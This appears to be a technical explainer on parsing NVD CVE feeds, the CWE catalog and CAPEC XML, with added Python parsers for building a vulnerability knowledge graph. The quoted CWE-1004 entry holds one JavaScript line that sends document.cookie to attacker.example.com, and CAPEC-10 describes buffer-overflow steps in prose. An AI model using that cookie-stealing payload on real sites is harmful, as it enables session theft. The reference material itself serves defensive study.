This project does not seem to have a dedicated download URL for CPE data; the CPE entries are extracted from the configuration data attached to each CVE, so they carry no description or other information.
I looked at the official data: https://nvd.nist.gov/products/cpe
Apart from a title and a few reference links, each entry in the official dictionary really only carries the version and the CPE ID, so it is no different from extracting the CPEs directly from the CVE data described below. Two entries from the official CPE dictionary XML:
<cpe-item name="cpe:/a:%240.99_kindle_books_project:%240.99_kindle_books:6::~~~android~~">
<title xml:lang="en-US">$0.99 Kindle Books project $0.99 Kindle Books (aka com.kindle.books.for99) for android 6.0</title>
<references>
<reference href="https://play.google.com/store/apps/details?id=com.kindle.books.for99">Product information</reference>
<reference href="https://docs.google.com/spreadsheets/d/1t5GXwjw82SyunALVJb2w0zi3FoLRIkfGPc7AMjRF0r4/edit?pli=1#gid=1053404143">Government Advisory</reference>
</references>
<cpe-23:cpe23-item name="cpe:2.3:a:\$0.99_kindle_books_project:\$0.99_kindle_books:6:*:*:*:*:android:*:*"/>
</cpe-item>
<cpe-item name="cpe:/a:%40nubosoftware%2fnode-static_project:%40nubosoftware%2fnode-static:-::~~~node.js~~">
<title xml:lang="en-US">@nubosoftware/node-static Project @nubosoftware/node-static for Node.js</title>
<references>
<reference href="https://www.npmjs.com/package/@nubosoftware/node-static">Project</reference>
</references>
<cpe-23:cpe23-item name="cpe:2.3:a:\@nubosoftware\/node-static_project:\@nubosoftware\/node-static:-:*:*:*:*:node.js:*:*"/>
</cpe-item>
Download URL: https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2014.json.gz
In nvdcve-1.1-2014.json.gz the 2014 can be replaced by any year; the code takes a start year and an end year, downloads the feed for every year in that range and merges them into one CVE dataset. (NVD has since retired these legacy 1.1 JSON feeds in favor of the NVD API 2.0, so check that the URL still serves data before depending on it.) One item from a feed looks like this:
{ "cve" : {
"data_type" : "CVE",
"data_format" : "MITRE",
"data_version" : "4.0",
"CVE_data_meta" : {
"ID" : "CVE-2021-0001",
"ASSIGNER" : "[email protected]"
},
"problemtype" : {
"problemtype_data" : [ {
"description" : [ {
"lang" : "en",
"value" : "CWE-203"
} ]
} ]
},
"references" : {
"reference_data" : [ {
"url" : "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00477.html",
"name" : "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00477.html",
"refsource" : "MISC",
"tags" : [ "Patch", "Vendor Advisory" ]
} ]
},
"description" : {
"description_data" : [ {
"lang" : "en",
"value" : "Observable timing discrepancy in Intel(R) IPP before version 2020 update 1 may allow authorized user to potentially enable information disclosure via local access."
} ]
}
},
"configurations" : {
"CVE_data_version" : "4.0",
"nodes" : [ {
"operator" : "OR",
"children" : [ ],
"cpe_match" : [ {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_4:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_3:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:-:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_1:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_2:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2020:-:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_dcap:*:*:*:*:*:linux:*:*",
"versionEndIncluding" : "1.10.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_sdk:*:*:*:*:*:linux:*:*",
"versionEndIncluding" : "2.13.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_dcap:*:*:*:*:*:windows:*:*",
"versionEndIncluding" : "1.10.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_psw:*:*:*:*:*:linux:*:*",
"versionEndIncluding" : "2.13.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_psw:*:*:*:*:*:windows:*:*",
"versionEndIncluding" : "2.12.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_sdk:*:*:*:*:*:windows:*:*",
"versionEndIncluding" : "2.12.100.4",
"cpe_name" : [ ]
} ]
} ]
},
"impact" : {
"baseMetricV3" : {
"cvssV3" : {
"version" : "3.1",
"vectorString" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"attackVector" : "LOCAL",
"attackComplexity" : "HIGH",
"privilegesRequired" : "LOW",
"userInteraction" : "NONE",
"scope" : "UNCHANGED",
"confidentialityImpact" : "HIGH",
"integrityImpact" : "NONE",
"availabilityImpact" : "NONE",
"baseScore" : 4.7,
"baseSeverity" : "MEDIUM"
},
"exploitabilityScore" : 1.0,
"impactScore" : 3.6
},
"baseMetricV2" : {
"cvssV2" : {
"version" : "2.0",
"vectorString" : "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"accessVector" : "LOCAL",
"accessComplexity" : "LOW",
"authentication" : "NONE",
"confidentialityImpact" : "PARTIAL",
"integrityImpact" : "NONE",
"availabilityImpact" : "NONE",
"baseScore" : 2.1
},
"severity" : "LOW",
"exploitabilityScore" : 3.9,
"impactScore" : 2.9,
"acInsufInfo" : false,
"obtainAllPrivilege" : false,
"obtainUserPrivilege" : false,
"obtainOtherPrivilege" : false,
"userInteractionRequired" : false
}
},
"publishedDate" : "2021-06-09T20:15Z",
"lastModifiedDate" : "2021-06-28T18:03Z"
}
Only the fields that need explaining are covered here.
problemtype
The problem type, which holds the CWE(s) associated with this CVE (here CWE-203). NVD also uses the placeholder values NVD-CWE-Other and NVD-CWE-noinfo in this field; they are not real CWE IDs and should be filtered out before linking to CWE data.
references
The sources of the reference information (url, refsource and tags such as "Patch" or "Vendor Advisory").
description
The textual description of the CVE.
cpe23Uri
The CPE 2.3 identifier of a product affected by the CVE; this is the key for linking a CVE to its CPEs. Two caveats: a cpe23Uri whose version field is * combined with versionStartIncluding / versionStartExcluding / versionEndIncluding / versionEndExcluding denotes a version range rather than one product (for example sgx_dcap up to and including 1.10.100.4 above), and a node may use "operator" : "AND" with nested children, in which case entries with "vulnerable" : false describe the platform the vulnerable product runs on, not a vulnerable product.
baseMetricV3
The CVSS v3 base metrics block, which contains cvssV3.
baseMetricV2
The CVSS v2 base metrics block, which contains cvssV2. Note that the v2 severity rating sits outside cvssV2 (severity), whereas in v3 it sits inside (baseSeverity).
vectorString
The CVSS vector string, a compact encoding of the metrics that characterize the vulnerability and its severity.
attackVector
The attack vector; "LOCAL" here means the attacker needs local access to the system.
attackComplexity
The attack complexity; "HIGH" here means the attack is relatively hard to carry out.
privilegesRequired
The privilege level required; "LOW" here means the attacker needs only low privileges.
userInteraction
Whether user interaction is required; "NONE" here means none.
scope
Whether the impact extends beyond the vulnerable component; "UNCHANGED" here means it does not reach other components or resources.
confidentialityImpact
The confidentiality impact; "HIGH" here means the vulnerability can disclose highly sensitive information.
integrityImpact
The integrity impact.
availabilityImpact
The availability impact.
baseScore
The base score (0.0 to 10.0).
baseSeverity
The base severity rating derived from the base score.
exploitabilityScore
The exploitability sub-score.
impactScore
The impact sub-score.
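The fields above are the ones a CVE/CWE/CPE graph actually needs, and the two caveats on cpe23Uri (version ranges, AND nodes) are where a naive extractor goes wrong. The following is an added example, not code from the original page or from the project it describes: it walks the configurations tree recursively, keeps only vulnerable entries, attaches any version range, and drops NVD's placeholder CWE values. SAMPLE_ITEM is a constructed abridgement of the CVE-2021-0001 item shown above plus a hypothetical AND node (the example:app / example:os CPEs are invented for illustration); load_feed() reads a real downloaded nvdcve-1.1-<year>.json.gz.

```python
# Added example (not the project's own code): parse one NVD 1.1 feed item into
# the pieces a CVE/CWE/CPE graph needs. SAMPLE_ITEM is a constructed abridgement
# of the CVE-2021-0001 item shown above, plus a hypothetical AND node to show
# the "running on" platform case; nothing here is downloaded.
import gzip
import json
from typing import Iterator

RANGE_KEYS = ("versionStartIncluding", "versionStartExcluding",
              "versionEndIncluding", "versionEndExcluding")

SAMPLE_ITEM = {
    "cve": {
        "CVE_data_meta": {"ID": "CVE-2021-0001"},
        "problemtype": {"problemtype_data": [
            {"description": [{"lang": "en", "value": "CWE-203"},
                             {"lang": "en", "value": "NVD-CWE-Other"}]}]},
        "description": {"description_data": [
            {"lang": "en", "value": "Observable timing discrepancy in Intel(R) IPP ..."}]},
    },
    "configurations": {"nodes": [
        {"operator": "OR", "children": [], "cpe_match": [
            {"vulnerable": True,
             "cpe23Uri": "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_4:*:*:*:*:*:*"},
            {"vulnerable": True,
             "cpe23Uri": "cpe:2.3:a:intel:sgx_dcap:*:*:*:*:*:linux:*:*",
             "versionEndIncluding": "1.10.100.4"}]},
        # Hypothetical AND node (constructed, CPEs invented): the app is
        # vulnerable only when running on the listed OS; the OS itself is not.
        {"operator": "AND", "cpe_match": [], "children": [
            {"operator": "OR", "cpe_match": [
                {"vulnerable": True, "cpe23Uri": "cpe:2.3:a:example:app:1.0:*:*:*:*:*:*:*"}]},
            {"operator": "OR", "cpe_match": [
                {"vulnerable": False, "cpe23Uri": "cpe:2.3:o:example:os:-:*:*:*:*:*:*:*"}]}]}]},
    "impact": {"baseMetricV3": {"cvssV3": {
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "baseScore": 4.7, "baseSeverity": "MEDIUM"}}},
}


def iter_cpe_matches(node: dict) -> Iterator[dict]:
    """Walk a configurations node depth-first, yielding every cpe_match entry.
    AND nodes keep their matches in nested children, so recursion is required."""
    yield from node.get("cpe_match", [])
    for child in node.get("children", []):
        yield from iter_cpe_matches(child)


def cwe_ids(item: dict) -> list[str]:
    """Real CWE IDs only; NVD-CWE-Other / NVD-CWE-noinfo are placeholders."""
    out = []
    for pt in item["cve"]["problemtype"]["problemtype_data"]:
        for d in pt["description"]:
            if d["value"].startswith("CWE-"):
                out.append(d["value"])
    return out


def affected_products(item: dict) -> list[dict]:
    """Vulnerable CPEs with their version range (empty dict for a single version)."""
    products = []
    for node in item["configurations"]["nodes"]:
        for m in iter_cpe_matches(node):
            if not m.get("vulnerable"):
                continue  # platform-only entry under an AND node
            products.append({
                "cpe23Uri": m["cpe23Uri"],
                "range": {k: m[k] for k in RANGE_KEYS if k in m},
            })
    return products


def summarize(item: dict) -> dict:
    v3 = item.get("impact", {}).get("baseMetricV3", {}).get("cvssV3", {})
    return {
        "id": item["cve"]["CVE_data_meta"]["ID"],
        "cwes": cwe_ids(item),
        "products": affected_products(item),
        "cvss3_vector": v3.get("vectorString"),
        "cvss3_score": v3.get("baseScore"),
    }


def load_feed(path: str) -> list[dict]:
    """Read one downloaded nvdcve-1.1-<year>.json.gz and summarize every item."""
    with gzip.open(path, "rt", encoding="utf-8") as fh:
        return [summarize(it) for it in json.load(fh)["CVE_Items"]]


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_ITEM), indent=2))
```

The recursive walk matters because the flat "nodes[*].cpe_match" shortcut silently misses every CPE under an AND node; keeping the range keys beside the CPE is what later lets a scanner decide whether a concrete version is inside the affected range.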
Download URL: http://cwe.mitre.org/data/xml/cwec_latest.xml.zip (a zip archive containing a single XML file). One Weakness element from it:
<Weakness ID="1004" Name="Sensitive Cookie Without 'HttpOnly' Flag" Abstraction="Variant" Structure="Simple" Status="Incomplete">
<Description>The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.</Description>
<Extended_Description>The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.</Extended_Description>
<Related_Weaknesses>
<Related_Weakness Nature="ChildOf" CWE_ID="732" View_ID="1000" Ordinal="Primary"/>
</Related_Weaknesses>
<Applicable_Platforms>
<Language Class="Not Language-Specific" Prevalence="Undetermined"/>
<Technology Class="Web Based" Prevalence="Undetermined"/>
</Applicable_Platforms>
<Background_Details>
<Background_Detail>An HTTP cookie is a small piece of data attributed to a specific website and stored on the user's computer by the user's web browser. This data can be leveraged for a variety of purposes including saving information entered into form fields, recording user activity, and for authentication purposes. Cookies used to save or record information generated by the user are accessed and modified by script code embedded in a web page. While cookies used for authentication are created by the website's server and sent to the user to be attached to future requests. These authentication cookies are often not meant to be accessed by the web page sent to the user, and are instead just supposed to be attached to future requests to verify authentication details.</Background_Detail>
</Background_Details>
<Modes_Of_Introduction>
<Introduction>
<Phase>Implementation</Phase>
</Introduction>
</Modes_Of_Introduction>
<Likelihood_Of_Exploit>Medium</Likelihood_Of_Exploit>
<Common_Consequences>
<Consequence>
<Scope>Confidentiality</Scope>
<Impact>Read Application Data</Impact>
<Note>If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.</Note>
</Consequence>
<Consequence>
<Scope>Integrity</Scope>
<Impact>Gain Privileges or Assume Identity</Impact>
<Note>If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.</Note>
</Consequence>
</Common_Consequences>
<Detection_Methods>
<Detection_Method Detection_Method_ID="DM-14">
<Method>Automated Static Analysis</Method>
<Description>Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)</Description>
<Effectiveness>High</Effectiveness>
</Detection_Method>
</Detection_Methods>
<Potential_Mitigations>
<Mitigation>
<Phase>Implementation</Phase>
<Description>Leverage the HttpOnly flag when setting a sensitive cookie in a response.</Description>
<Effectiveness>High</Effectiveness>
<Effectiveness_Notes>While this mitigation is effective for protecting cookies from a browser's own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie.</Effectiveness_Notes>
</Mitigation>
</Potential_Mitigations>
<Demonstrative_Examples>
<Demonstrative_Example>
<Intro_Text>In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.</Intro_Text>
<Body_Text>The snippet of code below establishes a new cookie to hold the sessionID.</Body_Text>
<Example_Code Nature="Bad" Language="Java">
<xhtml:div>String sessionID = generateSessionId();<xhtml:br/>Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>response.addCookie(c);</xhtml:div>
</Example_Code>
<Body_Text>The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:</Body_Text>
<Example_Code Nature="Attack" Language="JavaScript">
<xhtml:div>document.write('&lt;img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'</xhtml:div>
</Example_Code>
<Body_Text>When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.</Body_Text>
<Body_Text>To mitigate the risk, use the setHttpOnly(true) method.</Body_Text>
<Example_Code Nature="Good" Language="Java">
<xhtml:div>String sessionID = generateSessionId();<xhtml:br/>Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>c.setHttpOnly(true);<xhtml:br/>response.addCookie(c);</xhtml:div>
</Example_Code>
</Demonstrative_Example>
</Demonstrative_Examples>
<Observed_Examples>
<Observed_Example>
<Reference>CVE-2014-3852</Reference>
<Description>CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.</Description>
<Link>https://www.cve.org/CVERecord?id=CVE-2014-3852</Link>
</Observed_Example>
<Observed_Example>
<Reference>CVE-2015-4138</Reference>
<Description>Appliance for managing encrypted communications does not use HttpOnly flag.</Description>
<Link>https://www.cve.org/CVERecord?id=CVE-2015-4138</Link>
</Observed_Example>
</Observed_Examples>
<References>
<Reference External_Reference_ID="REF-2"/>
<Reference External_Reference_ID="REF-3"/>
<Reference External_Reference_ID="REF-4"/>
<Reference External_Reference_ID="REF-5"/>
</References>
<Mapping_Notes>
<Usage>Allowed</Usage>
<Rationale>This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.</Rationale>
<Comments>Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.</Comments>
<Reasons>
<Reason Type="Acceptable-Use"/>
</Reasons>
</Mapping_Notes>
<Content_History>
<Submission>
<Submission_Name>CWE Content Team</Submission_Name>
<Submission_Organization>MITRE</Submission_Organization>
<Submission_Date>2017-01-02</Submission_Date>
<Submission_Version>2.10</Submission_Version>
<Submission_ReleaseDate>2017-01-19</Submission_ReleaseDate>
</Submission>
<Modification>
<Modification_Name>CWE Content Team</Modification_Name>
<Modification_Organization>MITRE</Modification_Organization>
<Modification_Date>2017-11-08</Modification_Date>
<Modification_Comment>updated Applicable_Platforms, References, Relationships</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CWE Content Team</Modification_Name>
<Modification_Organization>MITRE</Modification_Organization>
<Modification_Date>2020-02-24</Modification_Date>
<Modification_Comment>updated Applicable_Platforms, Relationships</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CWE Content Team</Modification_Name>
<Modification_Organization>MITRE</Modification_Organization>
<Modification_Date>2021-10-28</Modification_Date>
<Modification_Comment>updated Relationships</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CWE Content Team</Modification_Name>
<Modification_Organization>MITRE</Modification_Organization>
<Modification_Date>2023-01-31</Modification_Date>
<Modification_Comment>updated Description</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CWE Content Team</Modification_Name>
<Modification_Organization>MITRE</Modification_Organization>
<Modification_Date>2023-04-27</Modification_Date>
<Modification_Comment>updated Detection_Factors, References, Relationships, Time_of_Introduction</Modification_Comment>
</Modification>
<Modification>
<Modification_Name>CWE Content Team</Modification_Name>
<Modification_Organization>MITRE</Modification_Organization>
<Modification_Date>2023-06-29</Modification_Date>
<Modification_Comment>updated Mapping_Notes</Modification_Comment>
</Modification>
</Content_History>
</Weakness>
<Related_Weaknesses> contains one or more child elements, each describing another weakness related to this one.
The Nature attribute gives the nature of the relationship; here it is "ChildOf", meaning this weakness is a child of the referenced weakness.
The CWE_ID attribute gives the CWE number of the related weakness; here it is "732", i.e. CWE-732.
The View_ID attribute gives the view in which the relationship holds; here it is "1000", the Research Concepts view.
The Ordinal attribute marks the importance of the relationship; here it is "Primary", meaning this is the primary parent relationship for the weakness.
<Applicable_Platforms> contains the child elements describing the platforms the weakness applies to.
The <Language> element indicates that the weakness is not specific to any programming language and that its prevalence in practice is undetermined; in other words it may occur in many languages, but how often it actually does is unknown.
The <Technology> element indicates that the weakness applies to web-based technology; like the <Language> element, its prevalence is also undetermined.
<Background_Details> contains background information on the weakness.
<Modes_Of_Introduction> contains the child elements describing how the weakness gets introduced.
The <Phase> element gives the phase in which the weakness is introduced; here it is "Implementation".
The <Likelihood_Of_Exploit> element gives the likelihood that the weakness is exploited; here it is "Medium".
<Common_Consequences> contains one or more <Consequence> elements describing the common consequences of the weakness.
The <Scope> element gives the scope of the consequence; here "Confidentiality" and "Integrity" respectively.
The <Impact> element gives the impact of the consequence; here "Read Application Data" and "Gain Privileges or Assume Identity" respectively.
The <Note> element gives additional explanation of the consequence. The first note says that without the HttpOnly flag, sensitive information stored in the cookie may be exposed to unintended parties; the second says that if the cookie is an authentication cookie, omitting the flag may let an attacker steal the authentication data (e.g. a session ID) and assume the user's identity.
<Detection_Methods> contains one or more detection methods.
The <Method> element gives the name of the detection method; here "Automated Static Analysis", commonly known as Static Application Security Testing (SAST).
The <Description> element gives a detailed description of the detection method.
The <Effectiveness> element gives the effectiveness of the method at detecting this weakness; here "High".
<Demonstrative_Examples> contains one or more demonstrative examples.
The <Intro_Text> element gives the introductory text of the example; here it describes using a cookie to store the session ID for a client's interaction with a website, and that the cookie is meant to be sent with every request the client makes.
The <Body_Text> element gives the body text of the example, describing its details.
The <Example_Code> element holds the example code. It has two attributes: Nature, the nature of the code ("Bad" for the flawed code, "Attack" for the attack code, "Good" for the fixed code), and Language, the language of the code (Java here, JavaScript for the attack snippet).
<Observed_Examples> contains one or more child elements describing real CVEs that exhibit this weakness; these are a second CWE-to-CVE link besides the problemtype field in the NVD data.
The <Reference> element holds the CVE ID used as the reference.
The <Description> element describes the case.
The <Link> element links to the case, usually the CVE record, for more detail.
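The explanation above is what a parser for the CWE catalog needs to pull out: the ID/Name/Abstraction attributes, the ChildOf edges, the consequences and the observed CVEs. The following is an added example, not code from the original page or the project it describes. One practical trap it handles: the catalog root declares a default XML namespace (CWE 4.x releases use http://cwe.mitre.org/cwe-7), so ElementTree reports every tag as "{namespace}Weakness" and plain find("Weakness") returns nothing; the code strips the namespace first. SAMPLE_XML is a constructed, abridged copy of the CWE-1004 entry shown above wrapped in a minimal catalog root; load_zip() opens a real downloaded cwec_latest.xml.zip.

```python
# Added example (not the project's own code): pull the graph-relevant fields out
# of the CWE catalog XML. SAMPLE_XML is a constructed, abridged copy of the
# CWE-1004 entry shown above, wrapped in a minimal catalog root that declares
# the default namespace used by CWE 4.x releases; nothing is downloaded.
import xml.etree.ElementTree as ET
import zipfile

SAMPLE_XML = """<?xml version="1.0"?>
<Weakness_Catalog xmlns="http://cwe.mitre.org/cwe-7" Version="4.12">
 <Weaknesses>
  <Weakness ID="1004" Name="Sensitive Cookie Without 'HttpOnly' Flag" Abstraction="Variant" Structure="Simple" Status="Incomplete">
   <Description>The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.</Description>
   <Related_Weaknesses>
    <Related_Weakness Nature="ChildOf" CWE_ID="732" View_ID="1000" Ordinal="Primary"/>
   </Related_Weaknesses>
   <Likelihood_Of_Exploit>Medium</Likelihood_Of_Exploit>
   <Common_Consequences>
    <Consequence><Scope>Confidentiality</Scope><Impact>Read Application Data</Impact></Consequence>
    <Consequence><Scope>Integrity</Scope><Impact>Gain Privileges or Assume Identity</Impact></Consequence>
   </Common_Consequences>
   <Observed_Examples>
    <Observed_Example><Reference>CVE-2014-3852</Reference><Link>https://www.cve.org/CVERecord?id=CVE-2014-3852</Link></Observed_Example>
    <Observed_Example><Reference>CVE-2015-4138</Reference><Link>https://www.cve.org/CVERecord?id=CVE-2015-4138</Link></Observed_Example>
   </Observed_Examples>
  </Weakness>
 </Weaknesses>
</Weakness_Catalog>
"""


def strip_namespaces(root: ET.Element) -> ET.Element:
    """Rewrite tags in place ("{uri}Weakness" -> "Weakness") so plain names
    match regardless of which namespace URI the catalog release declares."""
    for el in root.iter():
        el.tag = el.tag.rsplit("}", 1)[-1]
    return root


def parse_weakness(w: ET.Element) -> dict:
    desc = w.find("Description")
    return {
        "id": "CWE-" + w.get("ID"),
        "name": w.get("Name"),
        "abstraction": w.get("Abstraction"),
        "status": w.get("Status"),
        "description": (desc.text or "").strip() if desc is not None else "",
        "likelihood": (w.findtext("Likelihood_Of_Exploit") or "").strip(),
        # ChildOf edges form the CWE hierarchy; View 1000 is "Research Concepts"
        "child_of": [
            {"cwe": "CWE-" + r.get("CWE_ID"), "view": r.get("View_ID")}
            for r in w.iterfind("Related_Weaknesses/Related_Weakness")
            if r.get("Nature") == "ChildOf"
        ],
        "consequences": [
            {"scope": [s.text for s in c.iterfind("Scope")],
             "impact": [i.text for i in c.iterfind("Impact")]}
            for c in w.iterfind("Common_Consequences/Consequence")
        ],
        # Observed_Examples give CWE -> CVE edges independent of NVD's mapping
        "observed_cves": [
            r.text.strip()
            for r in w.iterfind("Observed_Examples/Observed_Example/Reference")
            if r.text and r.text.strip().startswith("CVE-")
        ],
    }


def parse_catalog(xml_bytes: bytes) -> dict:
    """Map 'CWE-<id>' -> record for every Weakness in the catalog."""
    root = strip_namespaces(ET.fromstring(xml_bytes))
    return {rec["id"]: rec for rec in map(parse_weakness, root.iter("Weakness"))}


def load_zip(path: str) -> dict:
    """Open the downloaded cwec_latest.xml.zip and parse the single XML inside."""
    with zipfile.ZipFile(path) as zf:
        name = next(n for n in zf.namelist() if n.endswith(".xml"))
        return parse_catalog(zf.read(name))


if __name__ == "__main__":
    for rec in parse_catalog(SAMPLE_XML.encode()).values():
        print(rec["id"], rec["name"], rec["child_of"], rec["observed_cves"])
```

Stripping namespaces in place is the simplest robust choice here because the CWE namespace URI changes between major schema versions; the alternative, passing a namespace map to every find(), breaks the first time MITRE bumps it.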
Download URL: http://capec.mitre.org/data/xml/capec_latest.xml. One Attack_Pattern element from it:
<Attack_Pattern ID="10" Name="Buffer Overflow via Environment Variables" Abstraction="Detailed" Status="Draft">
<Description>This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.</Description>
<Extended_Description>Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary's shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.</Extended_Description>
<Likelihood_Of_Attack>High</Likelihood_Of_Attack>
<Typical_Severity>High</Typical_Severity>
<Related_Attack_Patterns>
<Related_Attack_Pattern Nature="ChildOf" CAPEC_ID="100"/>
</Related_Attack_Patterns>
<Execution_Flow>
<Attack_Step>
<Step>1</Step>
<Phase>Explore</Phase>
<Description>[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer.</Description>
</Attack_Step>
<Attack_Step>
<Step>2</Step>
<Phase>Experiment</Phase>
<Description>[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.</Description>
<Technique>Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found.</Technique>
</Attack_Step>
<Attack_Step>
<Step>3</Step>
<Phase>Experiment</Phase>
<Description>[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.</Description>
<Technique>Create malicious shellcode that will execute when the program execution is returned to it.</Technique>
<Technique>Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs</Technique>
</Attack_Step>
<Attack_Step>
<Step>4</Step>
<Phase>Exploit</Phase>
<Description>[Overflow the buffer] Using the injection vector, the adversary injects the crafted overflow content into the buffer.</Description>
</Attack_Step>
</Execution_Flow>
<Prerequisites>
<Prerequisite>The application uses environment variables.</Prerequisite>
<Prerequisite>An environment variable exposed to the user is vulnerable to a buffer overflow.</Prerequisite>
<Prerequisite>The vulnerable environment variable uses untrusted data.</Prerequisite>
<Prerequisite>Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer.</Prerequisite>
</Prerequisites>
<Skills_Required>
<Skill Level="Low">An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.</Skill>
<Skill Level="High">Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.</Skill>
</Skills_Required>
<Indicators>
<Indicator>If the application does bound checking, it should fail when the data source is larger than the size of the destination buffer. If the application's code is well written, that failure should trigger an alert.</Indicator>
</Indicators>
<Consequences>
<Consequence>
<Scope>Availability</Scope>
<Impact>Unreliable Execution</Impact>
</Consequence>
<Consequence>
<Scope>Confidentiality</Scope>
<Scope>Integrity</Scope>
<Scope>Availability</Scope>
<Impact>Execute Unauthorized Commands</Impact>
<Note>Run Arbitrary Code</Note>
</Consequence>
<Consequence>
<Scope>Confidentiality</Scope>
<Impact>Read Data</Impact>
</Consequence>
<Consequence>
<Scope>Integrity</Scope>
<Impact>Modify Data</Impact>
</Consequence>
<Consequence>
<Scope>Confidentiality</Scope>
<Scope>Access Control</Scope>
<Scope>Authorization</Scope>
<Impact>Gain Privileges</Impact>
</Consequence>
</Consequences>
<Mitigations>
<Mitigation>Do not expose environment variable to the user.</Mitigation>
<Mitigation>Do not use untrusted data in your environment variables.</Mitigation>
<Mitigation>Use a language or compiler that performs automatic bounds checking</Mitigation>
<Mitigation>There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.</Mitigation>
</Mitigations>
<Example_Instances>
<Example>
<xhtml:p>A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. See also: CVE-1999-0906</xhtml:p>
</Example>
<Example>
<xhtml:p>A buffer overflow in the rlogin program involves its consumption of the $TERM environmental variable. See also: CVE-1999-0046</xhtml:p>
</Example>
</Example_Instances>
<Related_Weaknesses>
<Related_Weakness CWE_ID="120"/>
